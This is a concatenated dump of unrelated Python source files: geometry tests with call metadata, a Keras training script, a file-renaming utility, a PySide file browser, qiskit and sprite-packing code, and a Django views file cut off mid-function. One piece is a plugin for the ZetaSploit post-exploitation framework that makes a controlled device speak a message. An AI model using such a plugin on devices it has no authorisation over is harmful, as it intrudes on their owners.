self.assertAlmostEqual(angle_half.angle(radians = True), np.arctan(2))
self.assertAlmostEqual(angle_horizontal.angle(radians = True), 0)
self.assertAlmostEqual(angle_vertical.angle(radians = True), np.pi / 2)
self.assertAlmostEqual(angle_1.angle(radians = False), 45)
self.assertAlmostEqual(angle_half.angle(radians = False), 63, places = 0)
self.assertAlmostEqual(angle_horizontal.angle(radians = False), 0)
self.assertAlmostEqual(angle_vertical.angle(radians = False), 90)
|
[
"numpy.arctan",
"random.randint",
"models.segment.Segment",
"models.point.Point"
] |
[((509, 527), 'models.segment.Segment', 'Segment', (['[a, b, c]'], {}), '([a, b, c])\n', (516, 527), False, 'from models.segment import Segment\n'), ((654, 667), 'models.point.Point', 'Point', (['(10)', '(20)'], {}), '(10, 20)\n', (659, 667), False, 'from models.point import Point\n'), ((680, 693), 'models.point.Point', 'Point', (['(20)', '(30)'], {}), '(20, 30)\n', (685, 693), False, 'from models.point import Point\n'), ((706, 719), 'models.point.Point', 'Point', (['(30)', '(40)'], {}), '(30, 40)\n', (711, 719), False, 'from models.point import Point\n'), ((739, 757), 'models.segment.Segment', 'Segment', (['[a, b, c]'], {}), '([a, b, c])\n', (746, 757), False, 'from models.segment import Segment\n'), ((1074, 1087), 'models.point.Point', 'Point', (['(10)', '(20)'], {}), '(10, 20)\n', (1079, 1087), False, 'from models.point import Point\n'), ((1100, 1113), 'models.point.Point', 'Point', (['(20)', '(30)'], {}), '(20, 30)\n', (1105, 1113), False, 'from models.point import Point\n'), ((1126, 1139), 'models.point.Point', 'Point', (['(30)', '(40)'], {}), '(30, 40)\n', (1131, 1139), False, 'from models.point import Point\n'), ((1159, 1177), 'models.segment.Segment', 'Segment', (['[a, b, c]'], {}), '([a, b, c])\n', (1166, 1177), False, 'from models.segment import Segment\n'), ((249, 260), 'models.segment.Segment', 'Segment', (['[]'], {}), '([])\n', (256, 260), False, 'from models.segment import Segment\n'), ((310, 332), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (324, 332), False, 'import unittest, random\n'), ((334, 356), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (348, 356), False, 'import unittest, random\n'), ((376, 398), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (390, 398), False, 'import unittest, random\n'), ((400, 422), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (414, 422), False, 'import unittest, random\n'), ((442, 464), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (456, 464), False, 'import unittest, random\n'), ((466, 488), 'random.randint', 'random.randint', (['(0)', '(100)'], {}), '(0, 100)\n', (480, 488), False, 'import unittest, random\n'), ((1202, 1215), 'models.point.Point', 'Point', (['(31)', '(40)'], {}), '(31, 40)\n', (1207, 1215), False, 'from models.point import Point\n'), ((1279, 1292), 'models.point.Point', 'Point', (['(31)', '(40)'], {}), '(31, 40)\n', (1284, 1292), False, 'from models.point import Point\n'), ((2123, 2135), 'numpy.arctan', 'np.arctan', (['(2)'], {}), '(2)\n', (2132, 2135), True, 'import numpy as np\n'), ((792, 805), 'models.point.Point', 'Point', (['(10)', '(20)'], {}), '(10, 20)\n', (797, 805), False, 'from models.point import Point\n'), ((1412, 1427), 'models.point.Point', 'Point', (['(100)', '(100)'], {}), '(100, 100)\n', (1417, 1427), False, 'from models.point import Point\n'), ((1551, 1564), 'models.point.Point', 'Point', (['(31)', '(40)'], {}), '(31, 40)\n', (1556, 1564), False, 'from models.point import Point\n'), ((1620, 1631), 'models.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (1625, 1631), False, 'from models.point import Point\n'), ((1633, 1646), 'models.point.Point', 'Point', (['(10)', '(10)'], {}), '(10, 10)\n', (1638, 1646), False, 'from models.point import Point\n'), ((1691, 1702), 'models.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (1696, 1702), False, 'from models.point import Point\n'), ((1704, 1717), 'models.point.Point', 'Point', (['(10)', '(20)'], {}), '(10, 20)\n', (1709, 1717), False, 'from models.point import Point\n'), ((1775, 1786), 'models.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (1780, 1786), False, 'from models.point import Point\n'), ((1788, 1801), 'models.point.Point', 'Point', (['(20)', '(10)'], {}), '(20, 10)\n', (1793, 1801), False, 'from models.point import Point\n'), ((1863, 1874), 'models.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (1868, 1874), False, 'from models.point import Point\n'), ((1876, 1888), 'models.point.Point', 'Point', (['(10)', '(0)'], {}), '(10, 0)\n', (1881, 1888), False, 'from models.point import Point\n'), ((1941, 1952), 'models.point.Point', 'Point', (['(0)', '(0)'], {}), '(0, 0)\n', (1946, 1952), False, 'from models.point import Point\n'), ((1954, 1966), 'models.point.Point', 'Point', (['(0)', '(10)'], {}), '(0, 10)\n', (1959, 1966), False, 'from models.point import Point\n')]
|
import efficientnet.keras as efn
import os
from keras.layers import *
from keras.models import Model
from keras.preprocessing.image import ImageDataGenerator
# load checkpoint
def get_efficentnet_check_point(argument):
check_points = {
0: efn.EfficientNetB0(weights='imagenet'),
1: efn.EfficientNetB1(weights='imagenet'),
2: efn.EfficientNetB2(weights='imagenet'),
3: efn.EfficientNetB3(weights='imagenet'),
4: efn.EfficientNetB4(weights='imagenet'),
5: efn.EfficientNetB5(weights='imagenet'),
6: efn.EfficientNetB6(weights='imagenet'),
7: efn.EfficientNetB7(weights='imagenet')
}
return check_points.get(argument, "Invalid month")
experiment_name = "test5_7"
data_dir = "test2"
working_dir = "/home/naor/projects/Image-Recognition"
model_name = f'{experiment_name}.h5'
train_data_input_folder = f'{working_dir}/{data_dir}/train/'
validation_data_input_folder = f'{working_dir}/test1/val/'
model_output_dir = f'{working_dir}/models'
model_output_path = f'{model_output_dir}/{model_name}'
if not os.path.exists(model_output_dir):
os.mkdir(model_output_dir)
# input dimension for current check point
input_dim = 600
model = efn.EfficientNetB7()
# remove last layer
model.layers.pop()
model.summary()
layer = Dense(5, activation='sigmoid', name='new_layer')(model.get_layer('avg_pool').output)
new_model = Model(model.input, layer)
# create new output layer
output_layer = Dense(5, activation='sigmoid', name='output')(new_model.get_layer('new_layer').output)
#
new_model = Model(model.input, output_layer)
# lock previous weights
for i, l in enumerate(new_model.layers):
if i < 228:
l.trainable = False
# new_model.compile(loss='sparse_categorical_crossentropy', optimizer='adam')
new_model.compile(loss='mean_squared_error', optimizer='adam')
# generate train data
train_datagen = ImageDataGenerator(
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
validation_split=0)
train_generator = train_datagen.flow_from_directory(
train_data_input_folder,
target_size=(input_dim, input_dim),
batch_size=8,
class_mode='categorical',
seed=2019,
subset='training')
validation_generator = train_datagen.flow_from_directory(
validation_data_input_folder,
target_size=(input_dim, input_dim),
batch_size=4,
class_mode='categorical',
seed=2019,
subset='validation')
new_model.fit_generator(
train_generator,
samples_per_epoch=2000 // 32,
epochs=40,
validation_steps=20,
validation_data=validation_generator,
nb_worker=24)
new_model.save(model_output_path)
|
[
"keras.preprocessing.image.ImageDataGenerator",
"os.mkdir",
"efficientnet.keras.EfficientNetB1",
"efficientnet.keras.EfficientNetB5",
"efficientnet.keras.EfficientNetB0",
"efficientnet.keras.EfficientNetB3",
"os.path.exists",
"efficientnet.keras.EfficientNetB7",
"keras.models.Model",
"efficientnet.keras.EfficientNetB2",
"efficientnet.keras.EfficientNetB6",
"efficientnet.keras.EfficientNetB4"
] |
[((1209, 1229), 'efficientnet.keras.EfficientNetB7', 'efn.EfficientNetB7', ([], {}), '()\n', (1227, 1229), True, 'import efficientnet.keras as efn\n'), ((1391, 1416), 'keras.models.Model', 'Model', (['model.input', 'layer'], {}), '(model.input, layer)\n', (1396, 1416), False, 'from keras.models import Model\n'), ((1559, 1591), 'keras.models.Model', 'Model', (['model.input', 'output_layer'], {}), '(model.input, output_layer)\n', (1564, 1591), False, 'from keras.models import Model\n'), ((1883, 1980), 'keras.preprocessing.image.ImageDataGenerator', 'ImageDataGenerator', ([], {'shear_range': '(0.2)', 'zoom_range': '(0.2)', 'horizontal_flip': '(True)', 'validation_split': '(0)'}), '(shear_range=0.2, zoom_range=0.2, horizontal_flip=True,\n validation_split=0)\n', (1901, 1980), False, 'from keras.preprocessing.image import ImageDataGenerator\n'), ((1076, 1108), 'os.path.exists', 'os.path.exists', (['model_output_dir'], {}), '(model_output_dir)\n', (1090, 1108), False, 'import os\n'), ((1114, 1140), 'os.mkdir', 'os.mkdir', (['model_output_dir'], {}), '(model_output_dir)\n', (1122, 1140), False, 'import os\n'), ((253, 291), 'efficientnet.keras.EfficientNetB0', 'efn.EfficientNetB0', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (271, 291), True, 'import efficientnet.keras as efn\n'), ((304, 342), 'efficientnet.keras.EfficientNetB1', 'efn.EfficientNetB1', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (322, 342), True, 'import efficientnet.keras as efn\n'), ((355, 393), 'efficientnet.keras.EfficientNetB2', 'efn.EfficientNetB2', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (373, 393), True, 'import efficientnet.keras as efn\n'), ((406, 444), 'efficientnet.keras.EfficientNetB3', 'efn.EfficientNetB3', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (424, 444), True, 'import efficientnet.keras as efn\n'), ((457, 495), 'efficientnet.keras.EfficientNetB4', 'efn.EfficientNetB4', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (475, 495), True, 'import efficientnet.keras as efn\n'), ((508, 546), 'efficientnet.keras.EfficientNetB5', 'efn.EfficientNetB5', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (526, 546), True, 'import efficientnet.keras as efn\n'), ((559, 597), 'efficientnet.keras.EfficientNetB6', 'efn.EfficientNetB6', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (577, 597), True, 'import efficientnet.keras as efn\n'), ((610, 648), 'efficientnet.keras.EfficientNetB7', 'efn.EfficientNetB7', ([], {'weights': '"""imagenet"""'}), "(weights='imagenet')\n", (628, 648), True, 'import efficientnet.keras as efn\n')]
|
# -*- coding: utf-8 -*-
from slugify import slugify
import os
"""Main module."""
def ascii_safe_filename(filename: str) -> dict:
file = os.path.splitext(filename)
slug = slugify(file[0], separator="_")
ext = file[1]
return {"f_in": filename, "f_out": "{}{}".format(slug, ext)}
def slugifile_directory(path: str):
success = True
messages = []
if path is None:
success = False
messages.append("No path specified. Done.")
else:
path = path.rstrip("\\/")
if not os.path.isdir(path):
success = False
messages.append("Path specified is not a directory. Done.")
else:
filenames = os.listdir(path)
for filename in filenames:
result = ascii_safe_filename(filename)
f_in = result["f_in"]
f_out = result["f_out"]
if f_in == f_out:
messages.append("Skipping: {}".format(f_in))
continue
filename_in = "{}/{}".format(path, f_in)
filename_out = "{}/{}".format(path, f_out)
messages.append("Renaming: {} => {}".format(f_in, f_out))
os.rename(filename_in, filename_out)
return {"success": success, "messages": messages}
|
[
"slugify.slugify",
"os.path.isdir",
"os.rename",
"os.path.splitext",
"os.listdir"
] |
[((145, 171), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (161, 171), False, 'import os\n'), ((183, 214), 'slugify.slugify', 'slugify', (['file[0]'], {'separator': '"""_"""'}), "(file[0], separator='_')\n", (190, 214), False, 'from slugify import slugify\n'), ((531, 550), 'os.path.isdir', 'os.path.isdir', (['path'], {}), '(path)\n', (544, 550), False, 'import os\n'), ((690, 706), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (700, 706), False, 'import os\n'), ((1217, 1253), 'os.rename', 'os.rename', (['filename_in', 'filename_out'], {}), '(filename_in, filename_out)\n', (1226, 1253), False, 'import os\n')]
|
import os
import sys
import subprocess
from PySide import QtGui, QtCore
class FileSystemModel(QtGui.QFileSystemModel):
filter_reset = QtCore.Signal()
root_index_changed = QtCore.Signal(QtCore.QModelIndex)
status_changed = QtCore.Signal(int, int)
STORAGE_NAME = '.filemon.dat'
def __init__(self):
QtGui.QFileSystemModel.__init__(self)
self.setFilter(QtCore.QDir.AllDirs |
QtCore.QDir.NoDot |
QtCore.QDir.NoDotDot |
QtCore.QDir.AllEntries |
QtCore.QDir.DirsFirst |
QtCore.QDir.Name)
self._processed = set()
self._marked_count = 0
self._total_count = 0
self.setNameFilterDisables(False)
self.directoryLoaded.connect(self._update_stats)
def _update_stats(self):
files = self._files()
print(files, self._processed)
self._marked_count = sum(1 for f in files if f in self._processed)
self._total_count = len(files)
self.status_changed.emit(self._total_count, self._marked_count)
@QtCore.Slot(str)
def filter_changed(self, text):
print('filter changed', text)
text = text.strip()
if text:
self.setNameFilters(['*' + text + '*'])
else:
self.setNameFilters([])
self._update_stats()
def _files(self):
ret = []
idx = self.index(self.rootPath())
for i in range(0, self.rowCount(idx)):
child = idx.child(i, idx.column())
ret.append(self.fileName(child))
return ret
def set_path(self, path):
print(path)
path = os.path.abspath(path)
self.reset()
self.setRootPath(path)
self.filter_reset.emit()
self.root_index_changed.emit(self.index(path))
storage = os.path.join(path, self.STORAGE_NAME)
self._processed = set()
present = set(os.listdir(path))
if os.path.isfile(storage):
with open(storage) as f:
data = set(f.read().splitlines())
self._processed = data - present
if data != self._processed:
self._save()
self._update_stats()
@QtCore.Slot()
def go_parent(self):
path = self.rootPath()
self.set_path(path + '/..')
@QtCore.Slot()
def go_home(self):
path = os.path.expanduser('~')
self.set_path(path)
@QtCore.Slot()
def go_cwd(self):
self.set_path(os.getcwd())
def file_dragged(self, path):
print("Dragged", path)
self._processed.add(path)
self._save()
def _save(self):
self._update_stats()
storage = os.path.join(self.rootPath(), self.STORAGE_NAME)
with open(storage, 'w') as f:
f.write('\n'.join(sorted(self._processed)))
def data(self, index, role):
if index.isValid() and role == QtCore.Qt.ForegroundRole:
path = self.filePath(index)
if path in self._processed:
return QtGui.QBrush(QtGui.QColor(255, 0, 0))
return super().data(index, role)
@QtCore.Slot()
def reset_markers(self):
self._processed = set()
self._save()
self.set_path(self.rootPath())
def unmark(self, index):
if not index.isValid():
return
path = self.filePath(index)
self._processed.discard(path)
self._save()
self.set_path(self.rootPath())
def start_file(self, index):
filename = self.fileName(index)
if sys.platform == "win32":
os.startfile(filename)
else:
opener = "open" if sys.platform == "darwin" else "xdg-open"
subprocess.call([opener, filename])
class FileView(QtGui.QListView):
def __init__(self, parent):
QtGui.QListView.__init__(self, parent)
self.setDragEnabled(True)
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self._drag_start_pos = event.pos()
return QtGui.QListView.mousePressEvent(self, event)
def mouseMoveEvent(self, event):
if not event.buttons() & QtCore.Qt.LeftButton:
return
if ((event.pos() - self._drag_start_pos).manhattanLength() <
QtGui.QApplication.startDragDistance()):
return
model = self.model()
drag = QtGui.QDrag(self)
index = self.indexAt(self._drag_start_pos)
if not index.isValid():
return
if model.isDir(index):
return
path = model.filePath(index)
mimedata = model.mimeData([index])
drag.setMimeData(mimedata)
drop_action = drag.exec_(QtCore.Qt.CopyAction)
if drop_action == QtCore.Qt.CopyAction:
model.file_dragged(path)
|
[
"os.path.expanduser",
"os.path.abspath",
"PySide.QtCore.Slot",
"os.getcwd",
"PySide.QtGui.QDrag",
"PySide.QtGui.QApplication.startDragDistance",
"PySide.QtGui.QColor",
"os.path.isfile",
"subprocess.call",
"PySide.QtGui.QFileSystemModel.__init__",
"PySide.QtCore.Signal",
"PySide.QtGui.QListView.mousePressEvent",
"PySide.QtGui.QListView.__init__",
"os.path.join",
"os.listdir",
"os.startfile"
] |
[((141, 156), 'PySide.QtCore.Signal', 'QtCore.Signal', ([], {}), '()\n', (154, 156), False, 'from PySide import QtGui, QtCore\n'), ((182, 215), 'PySide.QtCore.Signal', 'QtCore.Signal', (['QtCore.QModelIndex'], {}), '(QtCore.QModelIndex)\n', (195, 215), False, 'from PySide import QtGui, QtCore\n'), ((237, 260), 'PySide.QtCore.Signal', 'QtCore.Signal', (['int', 'int'], {}), '(int, int)\n', (250, 260), False, 'from PySide import QtGui, QtCore\n'), ((1120, 1136), 'PySide.QtCore.Slot', 'QtCore.Slot', (['str'], {}), '(str)\n', (1131, 1136), False, 'from PySide import QtGui, QtCore\n'), ((2255, 2268), 'PySide.QtCore.Slot', 'QtCore.Slot', ([], {}), '()\n', (2266, 2268), False, 'from PySide import QtGui, QtCore\n'), ((2367, 2380), 'PySide.QtCore.Slot', 'QtCore.Slot', ([], {}), '()\n', (2378, 2380), False, 'from PySide import QtGui, QtCore\n'), ((2477, 2490), 'PySide.QtCore.Slot', 'QtCore.Slot', ([], {}), '()\n', (2488, 2490), False, 'from PySide import QtGui, QtCore\n'), ((3168, 3181), 'PySide.QtCore.Slot', 'QtCore.Slot', ([], {}), '()\n', (3179, 3181), False, 'from PySide import QtGui, QtCore\n'), ((329, 366), 'PySide.QtGui.QFileSystemModel.__init__', 'QtGui.QFileSystemModel.__init__', (['self'], {}), '(self)\n', (360, 366), False, 'from PySide import QtGui, QtCore\n'), ((1693, 1714), 'os.path.abspath', 'os.path.abspath', (['path'], {}), '(path)\n', (1708, 1714), False, 'import os\n'), ((1873, 1910), 'os.path.join', 'os.path.join', (['path', 'self.STORAGE_NAME'], {}), '(path, self.STORAGE_NAME)\n', (1885, 1910), False, 'import os\n'), ((1994, 2017), 'os.path.isfile', 'os.path.isfile', (['storage'], {}), '(storage)\n', (2008, 2017), False, 'import os\n'), ((2419, 2442), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (2437, 2442), False, 'import os\n'), ((3873, 3911), 'PySide.QtGui.QListView.__init__', 'QtGui.QListView.__init__', (['self', 'parent'], {}), '(self, parent)\n', (3897, 3911), False, 'from PySide import QtGui, QtCore\n'), ((4098, 4142), 'PySide.QtGui.QListView.mousePressEvent', 'QtGui.QListView.mousePressEvent', (['self', 'event'], {}), '(self, event)\n', (4129, 4142), False, 'from PySide import QtGui, QtCore\n'), ((4445, 4462), 'PySide.QtGui.QDrag', 'QtGui.QDrag', (['self'], {}), '(self)\n', (4456, 4462), False, 'from PySide import QtGui, QtCore\n'), ((1965, 1981), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (1975, 1981), False, 'import os\n'), ((2535, 2546), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2544, 2546), False, 'import os\n'), ((3640, 3662), 'os.startfile', 'os.startfile', (['filename'], {}), '(filename)\n', (3652, 3662), False, 'import os\n'), ((3761, 3796), 'subprocess.call', 'subprocess.call', (['[opener, filename]'], {}), '([opener, filename])\n', (3776, 3796), False, 'import subprocess\n'), ((4340, 4378), 'PySide.QtGui.QApplication.startDragDistance', 'QtGui.QApplication.startDragDistance', ([], {}), '()\n', (4376, 4378), False, 'from PySide import QtGui, QtCore\n'), ((3096, 3119), 'PySide.QtGui.QColor', 'QtGui.QColor', (['(255)', '(0)', '(0)'], {}), '(255, 0, 0)\n', (3108, 3119), False, 'from PySide import QtGui, QtCore\n')]
|
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from core.badges import badges
class ZetaSploitPlugin:
def __init__(self, controller):
self.controller = controller
self.badges = badges()
self.details = {
'Name': "multi/trolling/say",
'Authors': ['enty8080'],
'Description': "Say text message on device.",
'Comment': "idk?"
}
self.options = {
'MESSAGE': {
'Description': "Message to say.",
'Value': "Hello, zeterpreter!",
'Required': True
}
}
def run(self):
status, output = self.controller.send_command("say", self.options['MESSAGE']['Value'])
if status == "error":
print(self.badges.E + "Failed to say message!")
|
[
"core.badges.badges"
] |
[((1282, 1290), 'core.badges.badges', 'badges', ([], {}), '()\n', (1288, 1290), False, 'from core.badges import badges\n')]
|
# vim:fileencoding=UTF-8
#
# Copyright ยฉ 2016, 2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 with modifications,
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://raw.githubusercontent.com/StanLivitski/EPyColl/master/LICENSE
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Helpers for obtaining information about callable
objects and have the same code run different types of callables.
Key elements
------------
prepare_call : A function that unwraps a callable, if necessary,
and tells whether the resulting object requires the ``self``
argument to be called.
call : Calls the target object, prepending ``self``
argument if necessary.
"""
import version
version.requirePythonVersion(3, 3)
def call(callable_, globals_, self, *args, **kwargs):
"""
Calls the target object, prepending ``self`` argument to
the argument list if necessary.
Parameters
----------
callable_ : callable
Reference to a function or method object or wrapper.
globals_ : dict
The dictionary of the module defining the target callable,
or the local dictionary for the scope in which the target callable's
container is defined.
self : object | None
The value to be passed as ``self`` argument, if
required by the target.
args : collections.Iterable
Any positional arguments, excluding ``self``.
kwargs : collections.Mapping
Any keyword arguments, excluding ``self``.
Returns
-------
object | None
Any value returned by the call.
Raises
------
TypeError
If the argument is not callable or has unknown type.
BaseException
Any exception thrown by the call.
See Also
--------
prepare_call : processes the callable before making the call
"""
target, selfNeeded = prepare_call(callable_, globals_)
_args = [ self ] if selfNeeded else []
_args.extend(args)
return target(*_args, **kwargs)
def prepare_call(callable_, globals_):
"""
Unwrap method decorators applied to ``callable_`` and
tell whether the resulting object requires the ``self``
argument to be called.
Dereferences ``@staticmethod`` and ``@classmethod`` decorators
and returns a flag telling whether explicit ``self`` argument
is required. This method may be used when preparing class
definitions (e.g. decorating methods) as well as at runtime.
Parameters
----------
callable_ : callable
Reference to a function or method object or wrapper.
globals_ : dict
The dictionary of the module defining the target callable,
or the local dictionary for the scope in which the target callable's
container is defined. If the container has not yet been defined
(e.g. when processing a decorator) this mapping should also contain
its future qualified name mapped to the ``object`` type value.
Returns
-------
callable
Dereferenced callable object.
boolean
A flag telling whether explicit ``self`` argument must
be on the argument list.
Raises
------
TypeError
If the argument is not callable or has unknown type.
"""
bindable = None
if not callable(callable_) and hasattr(callable_, '__func__'):
if isinstance(callable_, staticmethod):
bindable = False
callable_ = callable_.__func__
if not callable(callable_):
raise TypeError('Argument of type %s is not callable' % type(callable_).__name__)
if hasattr(callable_, '__self__'):
bindable = False
if bindable is None:
prefix = callable_.__qualname__[:-len(callable_.__name__)]
if prefix:
assert '.' == prefix[-1]
prefix = prefix[:-1]
try:
bindable = isinstance(eval(prefix, globals_), type)
except:
bindable = False
else:
bindable = False
return callable_, bindable
|
[
"version.requirePythonVersion"
] |
[((1111, 1145), 'version.requirePythonVersion', 'version.requirePythonVersion', (['(3)', '(3)'], {}), '(3, 3)\n', (1139, 1145), False, 'import version\n')]
|
print('\nDevice Monitor')
print('----------------')
from qiskit import IBMQ
from qiskit.tools.monitor import backend_overview
IBMQ.enable_account('Insert API token here') # Insert your API token in to here
provider = IBMQ.get_provider(hub='ibm-q')
backend_overview() # Function to get all information back about each quantum device
print('\nPress any key to close')
input()
|
[
"qiskit.IBMQ.enable_account",
"qiskit.tools.monitor.backend_overview",
"qiskit.IBMQ.get_provider"
] |
[((128, 172), 'qiskit.IBMQ.enable_account', 'IBMQ.enable_account', (['"""Insert API token here"""'], {}), "('Insert API token here')\n", (147, 172), False, 'from qiskit import IBMQ\n'), ((219, 249), 'qiskit.IBMQ.get_provider', 'IBMQ.get_provider', ([], {'hub': '"""ibm-q"""'}), "(hub='ibm-q')\n", (236, 249), False, 'from qiskit import IBMQ\n'), ((251, 269), 'qiskit.tools.monitor.backend_overview', 'backend_overview', ([], {}), '()\n', (267, 269), False, 'from qiskit.tools.monitor import backend_overview\n')]
|
import copy
class SquareAlgorithmNode(object):
def __init__(self, x=0, y=0, width=0, height=0, used=False,
down=None, right=None):
"""Node constructor.
:param x: X coordinate.
:param y: Y coordinate.
:param width: Image width.
:param height: Image height.
:param used: Flag to determine if the node is used.
:param down: Down :class:`~Node`.
:param right Right :class:`~Node`.
"""
self.x = x
self.y = y
self.width = width
self.height = height
self.used = used
self.right = right
self.down = down
def find(self, node, width, height):
"""Find a node to allocate this image size (width, height).
:param node: Node to search in.
:param width: Pixels to grow down (width).
:param height: Pixels to grow down (height).
"""
if node.used:
return self.find(node.right, width, height) or self.find(node.down, width, height)
elif node.width >= width and node.height >= height:
return node
return None
def grow(self, width, height):
""" Grow the canvas to the most appropriate direction.
:param width: Pixels to grow down (width).
:param height: Pixels to grow down (height).
"""
can_grow_d = width <= self.width
can_grow_r = height <= self.height
should_grow_r = can_grow_r and self.height >= (self.width + width)
should_grow_d = can_grow_d and self.width >= (self.height + height)
if should_grow_r:
return self.grow_right(width, height)
elif should_grow_d:
return self.grow_down(width, height)
elif can_grow_r:
return self.grow_right(width, height)
elif can_grow_d:
return self.grow_down(width, height)
return None
def grow_right(self, width, height):
"""Grow the canvas to the right.
:param width: Pixels to grow down (width).
:param height: Pixels to grow down (height).
"""
old_self = copy.copy(self)
self.used = True
self.x = self.y = 0
self.width += width
self.down = old_self
self.right = SquareAlgorithmNode(x=old_self.width,
y=0,
width=width,
height=self.height)
node = self.find(self, width, height)
if node:
return self.split(node, width, height)
return None
def grow_down(self, width, height):
"""Grow the canvas down.
:param width: Pixels to grow down (width).
:param height: Pixels to grow down (height).
"""
old_self = copy.copy(self)
self.used = True
self.x = self.y = 0
self.height += height
self.right = old_self
self.down = SquareAlgorithmNode(x=0,
y=old_self.height,
width=self.width,
height=height)
node = self.find(self, width, height)
if node:
return self.split(node, width, height)
return None
def split(self, node, width, height):
"""Split the node to allocate a new one of this size.
:param node: Node to be splitted.
:param width: New node width.
:param height: New node height.
"""
node.used = True
node.down = SquareAlgorithmNode(x=node.x,
y=node.y + height,
width=node.width,
height=node.height - height)
node.right = SquareAlgorithmNode(x=node.x + width,
y=node.y,
width=node.width - width,
height=height)
return node
class SquareAlgorithm(object):
def process(self, sprite):
root = SquareAlgorithmNode(width=sprite.images[0].absolute_width,
height=sprite.images[0].absolute_height)
# Loot all over the images creating a binary tree
for image in sprite.images:
node = root.find(root, image.absolute_width, image.absolute_height)
if node: # Use this node
node = root.split(node, image.absolute_width, image.absolute_height)
else: # Grow the canvas
node = root.grow(image.absolute_width, image.absolute_height)
image.x = node.x
image.y = node.y
|
[
"copy.copy"
] |
[((2132, 2147), 'copy.copy', 'copy.copy', (['self'], {}), '(self)\n', (2141, 2147), False, 'import copy\n'), ((2823, 2838), 'copy.copy', 'copy.copy', (['self'], {}), '(self)\n', (2832, 2838), False, 'import copy\n')]
|
import re
import csv
import codecs
import json
import os
import environ
from django.shortcuts import render, get_object_or_404
from django.http import (
HttpResponse,
HttpResponseNotFound,
)
from django.db.models import (
Q,
F,
Count,
Sum
)
from django.conf import settings
from apps.data.models import (
Dataset,
Taxon,
SimpleData,
)
from apps.article.models import Article
from .models import Post, Journal
from utils.mail import taibif_mail_contact_us
from apps.data.helpers.stats import get_home_stats
from django.utils.translation import ugettext as _
from django.views.decorators.http import require_GET
def index(request):
news_list = Article.objects.filter(category='NEWS').all()[0:4]
event_list = Article.objects.filter(category='EVENT').all()[0:4]
update_list = Article.objects.filter(category='UPDATE').all()[0:4]
#topic_list = Article.objects.filter(category__in=['SCI', 'TECH', 'PUB']).order_by('?').all()[0:10]
topic_list = Article.objects.filter(is_homepage=True).order_by('?').all()[0:10]
context = {
'news_list': news_list,
'event_list': event_list,
'update_list': update_list,
'topic_list': topic_list,
'stats': get_home_stats(),
}
return render(request, 'index.html', context)
def publishing_data(request):
return render(request, 'publishing-data.html')
def journals(request):
Journal_url = Journal.objects.all()
return render(None,'journals.html', locals())
def cookbook(request):
return render(request, 'cookbook.html')
def cookbook_detail_1(request):
return render(request, 'cookbook-detail-1.html')
def cookbook_detail_2(request):
return render(request, 'cookbook-detail-2.html')
def cookbook_detail_3(request):
return render(request, 'cookbook-detail-3.html')
def tools(request):
return render(request, 'tools.html')
def contact_us(request):
if request.method == 'GET':
return render(request, 'contact-us.html')
elif request.method == 'POST':
data = {
'name': request.POST.get('name', ''),
'cat': request.POST.get('cat', ''),
'email': request.POST.get('email', ''),
'content': request.POST.get('content', ''),
}
context = taibif_mail_contact_us(data)
#context = taibif_send_mail(subject, content, settings.SERVICE_EMAIL, to_list)
return render(request, 'contact-us.html', context)
def plans(request):
return render(request, 'plans.html')
def links(request):
Post_url = Post.objects.all()
return render(None,'links.html', locals())
def about_taibif(request):
return render(request, 'about-taibif.html')
def about_gbif(request):
return render(request, 'about-gbif.html')
def open_data(request):
return render(request, 'open-data.html')
def data_stats(request):
is_most = request.GET.get('most', '')
query = Dataset.objects #.exclude(status='Private')
if is_most:
query = query.filter(is_most_project=True)
context = {
